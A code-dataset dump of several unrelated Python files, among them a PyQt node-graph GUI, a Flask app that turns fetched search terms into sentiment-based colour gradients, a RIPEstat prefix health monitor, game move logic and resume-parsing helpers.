self.scene().enterConnectionMode(self.mapToScene(self.mapFromItem(self, rect.center())))\n return\n\n self._activeTerminal = None\n QtGui.QGraphicsItem.mousePressEvent(self, event)\n\n def mouseReleaseEvent(self, event):\n \"\"\"\n Mouse press event override for highlighting.\n \"\"\"\n self._activeTerminal = None\n QtGui.QGraphicsItem.mouseReleaseEvent(self, event)\n\n self.release()\n self.update()\n\n def mouseDoubleClickEvent(self, event):\n terminal = self.terminal(self.mapToScene(event.pos()))\n if terminal:\n if terminal == 'data':\n pass\n else:\n for connection in self.connections:\n if connection.connected[self] == terminal:\n connection.disconnect()\n self.scene()._deleted.append(connection)\n return\n\n if self._DoubleClickFunction:\n self._DoubleClickFunction(self)\n\n def connect(self, thisTerminal, node, thatTerminal):\n return Connection(self, node, thisTerminal, thatTerminal)\n\n def boundingRect(self):\n return QtCore.QRectF(0, 0, self._width, self._height + (20 * len(self._data)) + 5)\n\n def paint(self, painter, option, widget):\n if self._nodeType == self.Rectangle:\n gradient = QtGui.QLinearGradient(0, 0, 0, self._height)\n if self._color:\n gradient.setColorAt(0, QtGui.QColor(self._color[0], self._color[1], self._color[2], 200))\n gradient.setColorAt(25 / self._height, QtGui.QColor(self._color[0], self._color[1], self._color[2], 200))\n gradient.setColorAt(1, QtGui.QColor(self._color[0]/2, self._color[1]/2, self._color[2]/2, 200))\n else:\n gradient.setColorAt(0, QtGui.QColor(70, 70, 90, 200))\n gradient.setColorAt(25 / self._height, QtGui.QColor(70, 70, 90, 200))\n gradient.setColorAt(1, QtGui.QColor(30, 30, 30, 200))\n\n gradient.setColorAt(20 / self._height, QtGui.QColor(50, 50, 50, 200))\n shadowOffset = 2.5\n painter.setBrush(QtGui.QColor(10, 10, 10, 30))\n painter.setPen(QtGui.QColor(10, 10, 10, 30))\n painter.drawRoundedRect(10 + shadowOffset, 0 + shadowOffset, self._width - 20 + shadowOffset, self._height - 10 + shadowOffset, 7.5, 7.5)\n\n if self.isSelected():\n painter.setPen(QtGui.QColor(100, 100, 170))\n else:\n painter.setPen(QtGui.QColor(70, 70, 90))\n\n painter.setBrush(QtGui.QBrush(gradient))\n painter.drawRoundedRect(10, 0, self._width - 20, self._height - 10, 7.5, 7.5)\n\n headerGrade = QtGui.QLinearGradient(0, 2.5, 0, 20)\n headerGrade.setColorAt(0, QtGui.QColor(70, 70, 70))\n headerGrade.setColorAt(.1, QtGui.QColor(100, 100, 100))\n headerGrade.setColorAt(1, QtGui.QColor(80, 80, 80))\n painter.setBrush(QtGui.QBrush(headerGrade))\n\n painter.drawRoundedRect(QtCore.QRect(0, 2.5, self._width, 20), 7.5, 7.5)\n painter.setPen(QtCore.Qt.white)\n painter.drawText(QtCore.QRect(0, 5, self._width, 15), QtCore.Qt.AlignCenter, self._name)\n painter.setPen(QtGui.QColor(70, 70, 90))\n\n headerGrade = QtGui.QLinearGradient(0, 0, 10, 0)\n headerGrade.setColorAt(0, QtGui.QColor(70, 90, 70))\n headerGrade.setColorAt(.1, QtGui.QColor(70, 120, 70))\n headerGrade.setColorAt(1, QtGui.QColor(70, 90, 70))\n painter.setBrush(QtGui.QBrush(headerGrade))\n\n offset = (len(self._inputs) / self._height) + 30\n size = 10\n highlighter = QtGui.QColor(100, 100, 120)\n\n for input in sorted(self._inputs.keys()):\n if not self._activeTerminal is None and input == self._activeTerminal:\n painter.setPen(highlighter)\n else:\n painter.setPen(QtGui.QColor(70, 70, 90))\n\n terminal = QtCore.QRect(0, offset, size, size)\n painter.drawEllipse(terminal)\n self._terminalPoints[input] = terminal\n painter.setPen(QtCore.Qt.white)\n painter.drawText(QtCore.QRect(size + 5, offset - 3, self._width - (size*2), (size*2)), QtCore.Qt.AlignLeft, input)\n offset += 30\n\n headerGrade = QtGui.QLinearGradient(self._width, 0, self._width - 10, 0)\n headerGrade.setColorAt(0, QtGui.QColor(90, 70, 70))\n headerGrade.setColorAt(.1, QtGui.QColor(150, 70, 70))\n headerGrade.setColorAt(1, QtGui.QColor(90, 70, 70))\n painter.setBrush(QtGui.QBrush(headerGrade))\n\n offset = (len(self._outputs) / self._height) + 30\n\n for output in sorted(self._outputs.keys()):\n if not self._activeTerminal is None and output == self._activeTerminal:\n painter.setPen(highlighter)\n else:\n painter.setPen(QtGui.QColor(70, 70, 90))\n terminal = QtCore.QRect(self._width - size, offset, size, size)\n painter.drawEllipse(terminal)\n self._terminalPoints[output] = terminal\n painter.setPen(QtCore.Qt.white)\n painter.drawText(QtCore.QRect(size - 5, offset - 3, self._width - (size*2), size*2), QtCore.Qt.AlignRight, output)\n offset += 30\n\n if self._data != {}:\n self._terminalPoints['data'] = QtCore.QRect((self._width / 2) - 5, self._height - 10, 10, 10)\n\n if self._showData != 0:\n self._showData = (20 * len(self._data))\n\n offset = self._height + 5\n\n pen = painter.pen()\n pen.setStyle(QtCore.Qt.DotLine)\n painter.setPen(pen)\n\n painter.drawLine(self._terminalPoints['data'].center(),\n QtCore.QPoint(self._terminalPoints['data'].center().x(), self._height + self._showData))\n\n pen = painter.pen()\n pen.setStyle(QtCore.Qt.SolidLine)\n pen.setBrush(QtGui.QColor(200, 200, 200))\n painter.setPen(pen)\n\n for key in sorted(self._data):\n painter.drawText(QtCore.QRect(0, offset - 3, self._width/2 - 3, self._width), QtCore.Qt.AlignRight, str(key))\n painter.drawText(QtCore.QRect(self._width/2 + 3, offset - 3, self._width/2, self._width), QtCore.Qt.AlignLeft,\n str(self._data[key]))\n\n offset += 20\n\n headerGrade = QtGui.QLinearGradient(0, self._terminalPoints['data'].y(), 0, self._terminalPoints['data'].y() + self._terminalPoints['data'].height())\n headerGrade.setColorAt(0, QtGui.QColor(70, 70, 120))\n headerGrade.setColorAt(.1, QtGui.QColor(100, 100, 150))\n headerGrade.setColorAt(1, QtGui.QColor(70, 70, 100))\n painter.setBrush(QtGui.QBrush(headerGrade))\n painter.setPen(QtGui.QColor(70, 70, 90))\n painter.drawEllipse(self._terminalPoints['data'])\n\n for connection in self.connections:\n connection.getTerminalScenePositions()\n\n\nclass CommentNode(QtGui.QGraphicsTextItem):\n def mouseDoubleClickEvent(self, event):\n import HFX\n\n comment = HFX.Dialog('Comment')\n input = HFX.MultiLineEdit()\n input.setText(self.toPlainText())\n comment.addWidget(input)\n\n if not comment.show():\n return\n\n self.setPlainText(input.toPlainText())\n\n def paint(self, painter, option, widget):\n\n origPen = painter.pen()\n origBrush = painter.brush()\n\n gradient = QtGui.QLinearGradient(0, 0, self.boundingRect().width(), 0)\n gradient.setColorAt(0, QtGui.QColor(50, 125, 50))\n gradient.setColorAt(1, QtGui.QColor(50, 125, 50, 0))\n painter.setBrush(gradient)\n painter.setPen(QtGui.QColor(70, 70, 90))\n painter.drawRoundedRect(self.boundingRect(), 7.5, 7.5)\n\n painter.setBrush(origBrush)\n painter.setPen(origPen)\n\n self.setDefaultTextColor(QtCore.Qt.white)\n\n QtGui.QGraphicsTextItem.paint(self, painter, option, widget)\n\n\nclass Connection(QtGui.QGraphicsLineItem):\n \"\"\"\n Connection item.\n \"\"\"\n def __init__(self, nodeA, nodeB, terminalA, terminalB):\n super(Connection, self).__init__()\n\n # Store nodes\n self.nodeA = nodeA\n self.nodeB = nodeB\n\n self.terminalAid = terminalA\n self.terminalBid = terminalB\n\n self.connected = {\n nodeA: terminalA,\n nodeB: terminalB\n }\n\n self.setZValue(-1)\n\n self.nodeA.connections.append(self)\n self.nodeB.connections.append(self)\n\n if terminalA not in self.nodeA._inputs:\n self.nodeA._outputs[terminalA].append(self.nodeB)\n else:\n self.nodeA._inputs[terminalA].append(self.nodeB)\n\n if terminalB not in self.nodeB._inputs:\n self.nodeB._outputs[terminalB].append(self.nodeA)\n else:\n self.nodeB._inputs[terminalB].append(self.nodeA)\n\n def _rangeLuma(self, value):\n return min(255, max(80, value))\n\n def paint(self, painter, option, widget):\n pen = QtGui.QPen()\n colA = [70, 70, 90]\n colB = [70, 70, 90]\n if self.nodeA._color:\n colA = self.nodeA._color\n if self.nodeB._color:\n colB = self.nodeB._color\n\n grad = QtGui.QLinearGradient(self.line().p1(), self.line().p2())\n grad.setColorAt(0, QtGui.QColor(\n self._rangeLuma(int((colA[0] + colB[0])/2) * 2),\n self._rangeLuma(int((colA[1] + colB[1])/2) * 2),\n self._rangeLuma(int((colA[2] + colB[2])/2) * 2)\n ))\n\n grad.setColorAt(.5, QtGui.QColor(\n self._rangeLuma(int((colA[0] + colB[0])/2)),\n self._rangeLuma(int((colA[1] + colB[1])/2)),\n self._rangeLuma(int((colA[2] + colB[2])/2))\n ))\n\n grad.setColorAt(1, QtGui.QColor(\n self._rangeLuma(int((colA[0] + colB[0])/2) * 2),\n self._rangeLuma(int((colA[1] + colB[1])/2) * 2),\n self._rangeLuma(int((colA[2] + colB[2])/2) * 2)\n ))\n\n pen.setBrush(grad)\n pen.setCapStyle(QtCore.Qt.RoundCap)\n pen.setJoinStyle(QtCore.Qt.RoundJoin)\n\n self.setPen(pen)\n\n QtGui.QGraphicsLineItem.paint(self, painter, option, widget)\n\n def disconnect(self):\n self.nodeA.connections.pop(self.nodeA.connections.index(self))\n self.nodeB.connections.pop(self.nodeB.connections.index(self))\n\n try:\n self.scene().removeItem(self)\n except AttributeError:\n return\n\n def getTerminalScenePositions(self):\n # Store terminal id information.\n try:\n self.terminalA = self.mapFromItem(self.nodeA, self.nodeA._terminalPoints[self.terminalAid].center())\n self.terminalB = self.mapFromItem(self.nodeB, self.nodeB._terminalPoints[self.terminalBid].center())\n self.setLine(self.terminalA.x(), self.terminalA.y(), self.terminalB.x(), self.terminalB.y())\n except KeyError:\n pass\n","sub_path":"HFX/hfx_gui/Graphics.py","file_name":"Graphics.py","file_ext":"py","file_size_in_byte":14892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"91537262","text":"\"\"\"Default values for a bunch of stuffs.\n\"\"\"\n\nGRADING_KEYS = [\n dict(key='A', verbose='Excellent', start=70, end=100),\n dict(key='B', verbose='Very Good', start=60, end=69),\n dict(key='C', verbose='Good', start=50, end=59),\n dict(key='D', verbose='Fair', start=40, end=49),\n dict(key='E', verbose='Weak', start=30, end=39),\n dict(key='F', verbose='Fail', start=00, end=29)\n]\n\nRATING_SCALE = [\n dict(key=5, verbose='Excellent'),\n dict(key=4, verbose='Very Good'),\n dict(key=3, verbose='Good'),\n dict(key=2, verbose='Fair'),\n dict(key=1, verbose='Fail'),\n]\n\nGRADING_SCHEME = dict(\n num_tests=2, percentager_per_test=30, percentage_exam=70, total=100)\n\nSECURITY_QUESTIONS = [\n dict(key=1, verbose='How old are you?'),\n dict(key=2, verbose='What is your favorite food?'),\n dict(key=3, verbose='What is the name of your pet?'),\n dict(key=4, verbose='What is your favorite song?'),\n]\n\nSCHOOL_LEVELS = [\n dict(key=1, verbose='Montessouri'),\n dict(key=2, verbose='Kindergarten'),\n dict(key=3, verbose='Nursery'),\n dict(key=3, verbose='Primary'),\n dict(key=4, verbose='Secondary'),\n]\n","sub_path":"silos/utils/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"311605485","text":"# Copyright 2017 BBVA\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport click\n\nfrom click.testing import CliRunner\n\nfrom apitest.actions.unittest.cli import generate\n\nimport apitest.actions.unittest.analyze.console\n\n\ndef _launch_apitest_generate_unittest_in_console(blah, **kwargs):\n click.echo(\"ok\")\n\n\ndef test_cli_analyze_runs_show_help():\n runner = CliRunner()\n result = runner.invoke(generate)\n\n assert 'Missing argument \"file_path\"' in result.output\n\n\ndef test_sendto_cli_analyze_runs_missing_options():\n # Patch the launch of: launch_apitest_generate_load_in_console\n apitest.actions.unittest.cli.launch_apitest_generate_unittest_in_console = _launch_apitest_generate_unittest_in_console\n\n runner = CliRunner()\n result = runner.invoke(generate, [\"sssss\"])\n\n assert 'Error: Missing option \"-o\" / \"--output-dir\"' in result.output\n\n\ndef test_sendto_cli_analyze_runs_ok_with_options():\n # Patch the launch of: launch_apitest_generate_load_in_console\n apitest.actions.unittest.cli.launch_apitest_generate_unittest_in_console = _launch_apitest_generate_unittest_in_console\n\n runner = CliRunner()\n result = runner.invoke(generate, [\"-o\", \"xxxx\", \"sssss\"])\n\n assert result.output == \"ok\\n\"\n","sub_path":"refactor/old/tests/unittesting/actions/sendto/cli/test_cli_generate.py","file_name":"test_cli_generate.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"64559285","text":"import copy\nclass Action:\n def __init__(self, type, n, a, b, colour):\n self.type = type\n self.n = n\n self.a = a\n self.b = b\n self.colour = colour\n if colour == \"white\":\n self.enemy = \"black\"\n elif colour == \"black\":\n self.enemy = \"white\"\n\n def apply_to(self, state):\n #return a state\n def boom(current_state, coord, boomed, colour, enemy):\n new_state = {}\n new_state[colour] = [x for x in current_state[colour] if x[1:3] != coord]\n new_state[enemy] = [y for y in current_state[enemy] if y[1:3] != coord]\n boomed.append(coord)\n xmin = coord[0]-1\n if xmin < 0:\n xmin = 0\n xmax = coord[0]+2\n if xmax > 8:\n xmax = 8\n ymin = coord[1]-1\n if ymin < 0:\n ymin = 0\n ymax = coord[1]+2\n if ymax > 8:\n ymax = 8\n if len(new_state[colour]) == 0 and len(new_state[enemy]) == 0:\n return new_state\n for x in range(xmin, xmax):\n for y in range(ymin, ymax):\n if [x,y] not in boomed:\n for member in new_state[colour]+new_state[enemy]:\n if member[1:3] == [x,y]:\n new_state = boom(new_state, [x,y], boomed, colour, enemy)\n break;\n\n return new_state\n def move(current_state, number, coord, f_coord, colour):\n #print(\"\\nMOVING \", colour, \" FROM \", coord, \" TO \", f_coord)\n new_state = copy.deepcopy(current_state)\n #print(\"CHANGING INTERNAL STATE\")\n #print(\"FROM\", new_state)\n #if moving onto another white then form a stack\n white_list=[(white[1], white[2]) for white in current_state[colour]]\n #print(\"WHITE LIST:\", white_list)\n #print(\"COORD :\", coord)\n #print(\"F_COORD:\", f_coord)\n if f_coord in white_list:\n #print(\"moving onto another white\")\n for white_member in new_state[colour]:\n if tuple(white_member[1:3]) == coord:\n #if moving all of the stack at once then remove current stack\n if white_member[0] == number:\n new_state[colour].remove(white_member)\n break\n #if moving part of the stack then remove a number from the stack\n if white_member[0] > number:\n white_member[0] -= number\n\n #then add the removed items onto existing stack at the destination\n for white_member in new_state[colour]:\n if tuple(white_member[1:3]) == f_coord:\n white_member[0] += number\n return new_state\n else:\n #print(\"not moving onto another white\")\n #if not moving onto any other white\n for white_member in new_state[colour]:\n if tuple(white_member[1:3]) == coord:\n #if moving all of the stack at once then just change the coord\n if number == white_member[0]:\n white_member[1] = f_coord[0]\n white_member[2] = f_coord[1]\n #if moving a part of the stack then add another stack to the destination\n if number < white_member[0]:\n white_member[0] -= number\n new_state[colour] += [[number] + list(f_coord)]\n #print(\"TO \", new_state)\n return new_state\n return new_state\n\n if self.type == \"BOOM\":\n return boom(state, self.a, [], self.colour, self.enemy)\n elif self.type == \"MOVE\":\n return move(state, self.n, self.a, self.b, self.colour)\n return state\n def return_stack(self):\n if self.type == \"BOOM\":\n return 0\n elif self.type == \"MOVE\":\n return self.n\n def return_action(self):\n if self.type == \"BOOM\":\n return (self.type, self.a)\n elif self.type == \"MOVE\":\n return (self.type, self.n, self.a, self.b)\n return None\n\n def is_valid(self, state):\n for i in self.b:\n if i<0 or i>7:\n return False\n #check if not going to black\n enemy_positions = [tuple(mem[1:3]) for mem in (state[self.enemy])]\n if self.b in enemy_positions:\n return False\n return True\n\n @classmethod\n def rewind_move(cls, action):\n return cls(action.type, action.n, action.b, action.a, action.colour)\n\n @classmethod\n def move_from_attributes(cls, n, coord, step, direction, colour):\n return cls(\"MOVE\", n, coord, (coord[0]+step*direction[0], coord[1]+step*direction[1]), colour)\n\n @classmethod\n def from_tuple(cls, tup, colour):\n if len(tup) == 2:\n return cls(tup[0], None, tup[1], None, colour)\n elif len(tup) == 4:\n return cls(tup[0], tup[1], tup[2], tup[3], colour)\n","sub_path":"enhance/action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":5286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"601435012","text":"\n__all__ = ['Console']\n\nfrom cocos.director import director\nfrom cocos.layer.interpreter import InterpreterLayer\n\n\nclass Console(InterpreterLayer):\n def init_config(self):\n super(Console, self).init_config()\n x,y = director.get_window_size()\n self.cfg['background.height'] = y / 3\n self.cfg['background.y'] = y / 3 * 2\n\n #################\n # Layer Events\n #################\n def on_enter(self):\n super(Console, self).on_enter()\n vw, vh = director.get_window_size()\n self.on_resize(vw, vh / 3)\n\n def on_resize(self, width, height):\n vw, vh = director.get_window_size()\n self.layout.begin_update()\n self.layout.height = vh / 3\n self.layout.x = 2\n self.layout.width = vw - 4\n self.layout.y = vh\n self.layout.end_update()\n\n # XXX: hack\n x,y = director.window.width, director.window.height\n self.layout.top_group._scissor_width = x - 4\n\n self.caret.position = len(self.document.text)\n","sub_path":"gamelib/tiless_editor/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"558148812","text":"from flask import Blueprint, request, render_template, flash, g, session, redirect, url_for, \\\n abort, jsonify, Flask\nfrom app.core.repository import *\nfrom flask import Flask, render_template, jsonify, request, make_response\nfrom textblob import TextBlob\nfrom numpy import mean # or write your own mean function\nfrom collections import defaultdict\nimport os, logging, json, requests, urllib2\n\nmod = Blueprint('core', __name__)\n\n@mod.route('/colorsPOST', methods=['POST'])\ndef colors():\n\tif request.method == 'POST':\n\t\tvals = getColors()\n\t\tuser = json.dumps(vals)\n\t\tresp = make_response(user)\n\t\tresp.headers[\"Content-Type\"] = \"application/json\"\n\telse:\n\t\tabort(500)\n\treturn resp\n\n@mod.route('/colors')\ndef printCols():\n\tvals = getColors()\n\treturn jsonify(gradients=vals)\n\n\n@mod.route('/')\ndef index():\n repository = Repository()\n vals = getColors()\n user = json.dumps(vals)\n return render_template('core/index.html', resources=repository.getResources(),user=user)\n\ndef getColors():\n\turl = \"http://www.pornmd.com/getliveterms\"\n\tjson = requests.get(url).json()\n\tjson_size = len(json)\n\tnewjson = dict()\n\tfor i, age in enumerate(d['segment'] for d in json): \n\t if age == 's':\n\t \tage = 255,10,10\n\t if age == 'g':\n\t \tage = 255,255,10\n\t if age == 't':\n\t \tage = 126,255,255\n\t newjson[i] = age \n\t # print i,age\n\tnewerjson = dict()\n\tfor i, msg in enumerate(d['keyword'] for d in json):\n\t\twiki = TextBlob(msg)\n\t\tnewerjson[i] = wiki.sentiment.polarity\n\t\tpolls = wiki.sentiment.polarity\n\t\tfeels = wiki.sentiment.subjectivity\n\t\tif polls != 0.0:\n\t\t\tOldRange = (1.0 - (-1.0) ) \n\t\t\tNewRange = (255 - 1) \n\t\t\tNewValue = (((polls - (-1.0)) * NewRange) / OldRange) + 1\n\t\t\tpolls = NewValue\n\t\tif feels != 0.0:\n\t\t\tOldRange = (1.0 - 0 )\n\t\t\tNewRange = (255 - 1) \n\t\t\tNewValue = (((feels - (-0)) * NewRange) / OldRange) + 1\n\t\t\tfeels = NewValue\n\t\tnewerjson[i] = (int(polls), int(feels), int((polls+feels)/2))\n\t\t# print i,msg,feels,polls\n\t# newestjson = dict()\n\tfor key in newjson:\n\t\tif newerjson[i] != (0,0,0):\n\t\t\tx = (newerjson[key], newjson[key])\n\t\t\ty = tuple(map(mean, zip(*x)))\n\t\t\tnewerjson[key] = y\n\tnewest = {k:v for k,v in newerjson.iteritems() if not v == (0,0,0)}\n\tFinalVals= newest.values()\n\tlister = zip(*[iter(FinalVals)] * 2)\n\tfinalDict = dict()\n\tcount = 0\n\tfor x, val in enumerate(FinalVals):\n\t\tif x == 0:\n\t\t\tfinalDict[count] = {}\n\t\t\tfinalDict[count]['start'] = val\n\t\tif x == 1:\n\t\t\tfinalDict[count]['stop'] = val\n\t\t\tcount += 1\n\t\tif x % 2 == 0:\n\t\t\tfinalDict[count] = {}\n\t\t\tfinalDict[count]['start'] = val\n\t\telse:\n\t\t\tif x > 2:\n\t\t\t\tfinalDict[count]['stop'] = val\n\t\t\t\tcount += 1\n\treturn finalDict.values()","sub_path":"fuck/app/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"167916970","text":"\"\"\"Manages some aspects of masked data.\"\"\"\n\n# This file is part of the 'tomate' project\n# (http://github.com/Descanonge/tomate) and subject\n# to the MIT License as defined in the file 'LICENSE',\n# at the root of this project. © 2020 Clément HAËCK\n\n\nimport numpy as np\n\ntry:\n import scipy.ndimage as ndimage\nexcept ImportError:\n _has_scipy = False\nelse:\n _has_scipy = True\n\nfrom tomate.db_types.data_compute import do_stack\n\n\ndef get_circle_kernel(n):\n \"\"\"Return circular kernel for convolution of size nxn.\n\n Parameters\n ----------\n n: int\n Diameter of kernel.\n\n Returns\n -------\n Array\n Shape (n, n)\n \"\"\"\n kernel = np.zeros((n, n))\n for i in range(n):\n for j in range(n):\n kernel[i, j] = (i-(n-1)/2)**2 + (j-(n-1)/2)**2 <= (n/2)**2\n\n return kernel\n\n\ndef enlarge_mask(mask, n_neighbors, axes=None):\n \"\"\"Enlarge a stack of boolean mask by `n_neighbors`.\n\n Parameters\n ----------\n mask: Array\n n_neighbors: int\n axes: List[int]\n Position of the two horizontal dimensions,\n other axes will be looped over.\n \"\"\"\n if not _has_scipy:\n raise ImportError(\"scipy package necessary to use enlarge_mask.\")\n\n N = 2*n_neighbors + 1\n kernel = get_circle_kernel(N)\n\n mask = do_stack(ndimage.convolve, 2, 1.*mask, kernel, axes) > 0\n\n return mask\n\n\ndef fill_edge(data, axes=None):\n \"\"\"Fill masked by value of closest pixel.\n\n Parameters\n ----------\n data: Array\n axes: List[int]\n Axes to work on.\n If None, the last two axes are used.\n \"\"\"\n if not _has_scipy:\n raise ImportError(\"scipy package necessary to use fill_edge.\")\n\n mask = data.mask\n small_mask = ~enlarge_mask(~mask, 1, axes=axes)\n to_fill_mask = small_mask * mask\n\n kernel = np.array([[0, 1, 0],\n [1, 0, 1],\n [0, 1, 0]])\n to_fill = do_stack(ndimage.convolve, 2, data.filled(0), kernel, axes)\n data.data[to_fill_mask] = to_fill\n return np.ma.array(data, mask=small_mask)\n","sub_path":"src/tomate/db_types/masked/mask.py","file_name":"mask.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"306021480","text":"# Write two Python functions to find the minimum number in a list.\na = [4, 2, 1, 3]\n\n# The first function should compare each number to every other number on\n# the list. O(n2).\n\n\ndef get_min_n_1(list):\n min_n = list[0]\n for n in list:\n for m in list:\n if n < m and n < min_n:\n min_n = n\n print(min_n)\n\n\nget_min_n_1(a)\n\n# The second function should be linear O(n).\n\n\ndef get_min_n_2(list):\n min_n = list[0]\n for n in list:\n if n < min_n:\n min_n = n\n print(min_n)\n\n\nget_min_n_2(a)\n","sub_path":"Chapter2/self_check1.py","file_name":"self_check1.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"113952439","text":"#! /usr/bin/env python\n\nfrom ApiClient import ApiClient\nfrom CommonConfig import CommonConfig\nfrom apscheduler.scheduler import Scheduler\nimport logging\nimport logging.handlers\nfrom colorlog import ColoredFormatter\nimport urllib\nimport urllib2\nimport json\nimport time\n\nsched = Scheduler()\nlogger = logging.getLogger(__name__)\n\nVERSION = \"0.1\"\nRIPESTATAPP = \"esgobanycast\"\n\nac = None\nenv = None\ncc = None\n\n\n@sched.interval_schedule(minutes=45)\ndef prefixhealth_ripestat():\n logger.info(\"Checking prefixes against RIPEstat\")\n\n resp = ac.Call(\"internal/anycastnodes.list\")\n if not resp.success:\n logger.error(\"Failed to get list of nodes\")\n return\n nodes = resp.data[\"anycastnodes\"]\n logger.debug(\"Retrived %s nodes\" % (len(nodes)))\n\n for node in nodes:\n id = node[\"id\"]\n if \"specific6\" not in node:\n logger.warn(\"%s has no specific v6 routes\", id)\n specific6 = node[\"specific6\"]\n logger.info(\"Checking %s specific %s v6 routes\" % (id, len(specific6)))\n for route in specific6:\n routesseen = ripestat_route_bgpstate(route)\n if routesseen is not None:\n logger.debug(\"%s routes %s\" % (routesseen, route))\n resp = ac.Call(\"internal/monitoring.prefixhealth.update?version=6&source=ripestat&prefix=%s&routes=%s\" % (route, routesseen))\n\n return\n\n\ndef ripestat_route_bgpstate(route):\n url = \"https://stat.ripe.net/data/bgp-state/data.json?resource=%s\" % (route)\n try:\n request = urllib2.Request(url)\n result = urllib2.urlopen(request)\n ripeobj = json.loads(result.read())\n except:\n logger.error(\"Error calling RIPEstat for prefix %s\" % (route))\n return None\n if \"data\" not in ripeobj:\n logger.error(\"Error parsing RIPEstat bgpstate 'data' not found, prefix %s\" % (route))\n return None\n data = ripeobj[\"data\"]\n if \"nr_routes\" not in data:\n logger.error(\"Error parsing RIPEstat bgpstate 'nr_routes' not found, prefix %s\" % (route))\n return None\n routes = int(data[\"nr_routes\"])\n return routes\n\ndef setupLogging():\n # setup logging\n logger.setLevel(logging.DEBUG)\n # log file\n setupLoggingFile()\n # console\n setupLoggingConsole()\n return\n\n\ndef setupLoggingConsole():\n formatter = ColoredFormatter(\n \"%(asctime)s %(log_color)s %(levelname)-8s%(reset)s %(white)s%(message)s\",\n datefmt=None,\n reset=True,\n log_colors={\n 'DEBUG': 'cyan',\n 'INFO': 'green',\n 'WARNING': 'yellow',\n 'ERROR': 'red',\n 'CRITICAL': 'red',\n }\n )\n stream = logging.StreamHandler()\n stream.setLevel(logging.DEBUG)\n stream.setFormatter(formatter)\n logger.addHandler(stream)\n return\n\n\ndef setupLoggingFile():\n logfilename = cc.getstr(\"logging\", \"logfilename\")\n logfilebytes = cc.getstr(\"logging\", \"logfilebytes\")\n logfilecount = cc.getstr(\"logging\", \"logfilecount\")\n rfhhandler = logging.handlers.RotatingFileHandler(logfilename, maxBytes=logfilebytes, backupCount=logfilecount)\n rfhhandler.setLevel(logging.DEBUG)\n rfhformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n rfhhandler.setFormatter(rfhformatter)\n logger.addHandler(rfhhandler)\n return\n\n\nif __name__ == '__main__':\n\n cc = CommonConfig()\n ac = ApiClient(commonconfig=cc)\n\n setupLogging()\n\n logger.info(\"Health monitor v%s\" % (VERSION))\n\n prefixhealth_ripestat()\n\n # scheduler\n# logger.info(\"Starting scheduler\")\n# sched.start()\n\n# logger.info(\"Sleeping\")\n# while True:\n# time.sleep(30)\n\n logger.info(\"exiting\")\n\n exit(0)\n","sub_path":"esgobhealth.py","file_name":"esgobhealth.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"608907486","text":"class style:\n BOLD = '\\033[1m'\n END = '\\033[0m'\n \ndef print_rec(dic):\n keys = dic.keys()\n for key in keys:\n print(style.BOLD + key + ': '+ style.END)\n print(dic[key])\n print('\\n')\n \ndef remove_spl_characters(text):\n text_alpha = ''\n for i in text:\n if not i.isalpha():\n if i == '+':\n text_alpha+=i\n else:\n text_alpha+=' '\n\n else:\n text_alpha+=i\n return text_alpha\n\ndef list_to_str(listt):\n strr = \"\" \n for x in listt:\n if len(listt)>1:\n strr += str(x)+\" \"\n else:\n strr = str(x)\n return strr\n\ndef lists_to_str(lists):\n return list_to_str(lists[0]), list_to_str(lists[1])\n\ndef preprocess_collegename_files(file):\n df = pd.read_csv(file, encoding = \"ISO-8859-1\")\n df.drop(df.iloc[:,1:], inplace = True, axis = 1)\n if(file.find('college')!=-1):\n df.rename(columns={'Name of the College':'collegename'},inplace=True)\n df['collegename'] = df.collegename.str.split(\",\",expand=True) \n else:\n df.rename(columns={'Name of the University':'univname'},inplace=True)\n df['univname'] = df.univname.str.split(\",\",expand=True)\n \n df_list = df.values\n df_l = []\n for element in df_list:\n df_l.append(\"\".join(element).replace(\" \", \"\").lower())\n return df_l\n\n\ndef search_college_from_text(text, l):\n pos = []\n names = []\n for val in l:\n x = text.find(val)\n if(x!=-1):\n pos.append(x)\n names.append(val)\n return pos, names\n\n\ndef extract_college_or_uni(text, college_l, uni_l):\n pos, names = search_college_from_text(text, college_l)\n if(len(pos) == 0):\n pos, names = search_college_from_text(text, uni_l)\n pos = list(dict.fromkeys(pos))\n names = list(dict.fromkeys(names))\n colleges = remove_repeated_collegenames(names)\n return colleges\n\n\ndef remove_repeated_collegenames(names):\n multiple = []\n for i in range(len(names)):\n name = names[i]\n for j in range(len(names)):\n if names[j].find(name)!= -1:\n name = names[j]\n multiple.append(name)\n multiple = list(dict.fromkeys(multiple))\n return multiple\n\ndef get_education_word_list(dir_path):\n file_name = \"education_segment.csv\"\n reader = read_csv(dir_path+file_name)\n education_word_list = []\n for row in reader:\n education_word_list.append(row[0])\n return education_word_list \n \ndef get_keywords(file_name):\n dir_path = ''\n reader = read_csv(dir_path + file_name)\n keywords = []\n for row in reader:\n 